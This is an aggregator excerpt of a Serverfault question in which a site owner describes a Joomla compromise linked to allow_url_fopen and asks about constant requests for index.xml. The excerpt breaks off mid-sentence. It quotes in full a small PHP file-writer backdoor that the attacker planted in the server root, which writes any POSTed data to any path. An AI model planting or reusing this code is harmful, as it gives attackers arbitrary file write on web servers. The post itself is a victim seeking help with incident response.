Constantly someone is making request for index.xml

view full story

http://serverfault.com – My server was recently been compromised due to Joomla and allow_url_fopen = ON I see various php files on my server root having this content in them Restricted accoss <?php error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 2); ob_implicit_flush (1); $file = "".$_POST["path"]; $fh = fopen ($file, 'w') or die(""); echo fwrite ($fh, stripslashes($_POST["raw_data"])); fclose($fh); so I close allow_url_fopen and delete all of these files. Now, my site is running fine for few minutes but it make requests for every few seconds to this address with givin (HowTos)